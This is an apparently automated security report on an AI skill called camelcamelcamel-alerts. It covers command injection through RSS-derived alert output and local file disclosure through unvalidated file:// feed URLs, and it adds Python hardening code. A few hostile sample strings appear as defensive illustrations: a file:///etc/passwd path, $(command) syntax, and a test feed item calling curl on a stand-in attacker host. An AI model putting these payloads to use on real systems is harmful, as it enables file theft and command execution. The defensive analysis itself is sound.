Trust Assessment
camelcamelcamel-alerts received a trust score of 73/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings (0 critical, 1 high, 2 medium, 0 low): a suspicious import of `urllib.request`; local file disclosure via an unvalidated RSS feed URL; and a command injection risk via unsanitized output handed to downstream execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| HIGH | **Command injection risk via unsanitized output for downstream execution.** The `scripts/notify.sh` script builds a message string from the `title`, `description` and `link` variables, all derived from untrusted RSS feed content, and emits it together with `title` and `link` as `ALERT|$title|$message|$link`. `SKILL.md` states this output is "piped to message action" (Clawbot's message tool). If the downstream message tool executes any part of this output (for example the `link` or `message` field) as a shell command without sanitization, a feed item crafted with shell metacharacters such as `$(command)` or backticks in its `link` would lead to command injection. `notify.sh` should escape shell metacharacters in every feed-controlled variable (`title`, `description`, `link`) before interpolating them into `message` and emitting the record; alternatively, the downstream message tool must guarantee robust sanitization or accept parameters in a safer form (structured data rather than raw strings destined for shell execution). | LLM | scripts/notify.sh:24 |
| MEDIUM | **Suspicious import: `urllib.request`.** Import of `urllib.request` detected. This module provides network access. Verify the import is necessary: network and system modules in skill code can be a vehicle for data exfiltration. | Static | skills/jgramajo4/camelcamelcamel-alerts/scripts/fetch_rss.py:11 |
| MEDIUM | **Local file disclosure via unvalidated RSS feed URL.** The `scripts/fetch_rss.py` script takes `feed_url` directly from `sys.argv[1]` without validation. `urllib.request.urlopen` supports the `file://` scheme, so a `feed_url` such as `file:///etc/passwd` attempts to read an arbitrary local file. The script expects XML, but any local file that happens to be valid XML would be parsed and exposed through the script's JSON output. Validate `feed_url` strictly: restrict it to `https://camelcamelcamel.com`, or at minimum allow only the `http` and `https` schemes and explicitly reject `file://`. Note that a scheme-only restriction still lets the caller point the fetch at any host, so pinning the host is the stronger fix. | LLM | scripts/fetch_rss.py:40 |
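The following is an added example, not code from the camelcamelcamel-alerts skill or from SkillShield, sketching the remediations the two LLM-layer findings ask for: feed-URL validation with a host allowlist plus an `urllib` opener that has no `file://` handler (the `fetch_rss.py` finding), and construction of the `ALERT|title|message|link` record with control characters, the `|` delimiter and shell metacharacters neutralised, alongside a JSON variant (the `notify.sh` finding). It is written in Python because `fetch_rss.py`, the producer of the feed data, is Python; moving the record formatting there instead of fixing the shell script is one possible design, not the skill's. The `https`-only allowlist of `camelcamelcamel.com`, the 300-character field cap and the hostile feed item used for illustration are all assumptions.

```python
"""Hardening sketch for the feed-URL and ALERT-record findings (added example)."""
import json
import re
import shlex
import urllib.request
from urllib.parse import urlsplit

# Assumption: the finding recommends pinning the feed to camelcamelcamel.com over https.
ALLOWED_HOSTS = frozenset({"camelcamelcamel.com"})
ALLOWED_SCHEMES = frozenset({"https"})


def validate_feed_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Accept only https URLs whose host is on the allowlist.

    Rejects file:///etc/passwd (scheme), https://evil.example/ (host),
    https://camelcamelcamel.com@evil.example/ (userinfo smuggling: the real
    host follows the @), camelcamelcamel.com.evil.example (suffix trick) and
    non-standard ports. Returns the stripped URL for the caller to use.
    """
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"disallowed scheme: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in feed URL is not allowed")
    if (parts.hostname or "").lower() not in allowed_hosts:
        raise ValueError(f"host not in allowlist: {parts.hostname!r}")
    if parts.port not in (None, 443):
        raise ValueError(f"non-standard port: {parts.port}")
    return url


def build_restricted_opener() -> urllib.request.OpenerDirector:
    """Opener that knows only http/https, as defence in depth behind validate_feed_url.

    urllib.request.urlopen() and build_opener() silently install FileHandler,
    FTPHandler and DataHandler, so the OpenerDirector is assembled by hand.
    UnknownHandler turns any other scheme into URLError instead of returning
    None. No HTTPRedirectHandler: a 3xx raises HTTPError, so the pinned host
    cannot bounce the fetch to a host off the allowlist.
    """
    opener = urllib.request.OpenerDirector()
    for handler in (urllib.request.HTTPHandler(), urllib.request.HTTPSHandler(),
                    urllib.request.HTTPDefaultErrorHandler(),
                    urllib.request.HTTPErrorProcessor(), urllib.request.UnknownHandler()):
        opener.add_handler(handler)
    return opener


def fetch_feed(url: str, timeout: float = 10.0) -> bytes:
    """Validate first, then fetch with the restricted opener (this one touches the network)."""
    with build_restricted_opener().open(validate_feed_url(url), timeout=timeout) as resp:
        return resp.read()


_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def clean_field(value: str, delimiter: str = "", max_len: int = 300) -> str:
    """Neutralise record-structure attacks in one feed item field.

    Control characters (including newlines, which would let one item forge a
    second ALERT line) become spaces, the record delimiter is replaced so a
    field cannot shift the columns, and the length is capped (300 is assumed).
    """
    value = _CONTROL.sub(" ", value)
    if delimiter:
        value = value.replace(delimiter, "/")
    return " ".join(value.split())[:max_len]


def safe_link(link: str) -> str:
    """Keep http(s) links only; javascript:, file: or data: links become empty."""
    link = clean_field(link, delimiter="|")
    return link if urlsplit(link).scheme.lower() in ("http", "https") else ""


def alert_line(title: str, description: str, link: str) -> str:
    """The skill's ALERT|title|message|link layout with every field shell-quoted.

    shlex.quote() single-quotes any value with unsafe characters, so $(...),
    backticks and ; stay inert if a consumer ever expands the record in a shell.
    """
    fields = (clean_field(title, "|"), clean_field(description, "|"), safe_link(link))
    return "ALERT|" + "|".join(shlex.quote(f) for f in fields)


def alert_json(title: str, description: str, link: str) -> str:
    """Preferred alternative: one JSON object per line, nothing for a shell to interpret."""
    return json.dumps({"type": "alert", "title": clean_field(title),
                       "description": clean_field(description), "link": safe_link(link)})


if __name__ == "__main__":
    # Constructed hostile feed item for illustration, not real camelcamelcamel data.
    hostile = ("Price drop $(curl evil.example)|FAKE",
               "cheap\nALERT|forged|x|y", "https://camelcamelcamel.com/product/example")
    print(alert_line(*hostile))
    print(alert_json(*hostile))
```

The two halves are independent: `validate_feed_url` is the check the finding asks `fetch_rss.py` to add before `urlopen`, and the restricted opener guarantees that even a validation bypass cannot reach `file://`, `ftp://` or `data:` URLs. On the output side, `alert_json` is the "structured data" option the finding mentions; `alert_line` keeps the existing pipe-delimited layout for a consumer that cannot be changed.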
Full report: https://skillshield.io/report/7dededf8c0d36791
Powered by SkillShield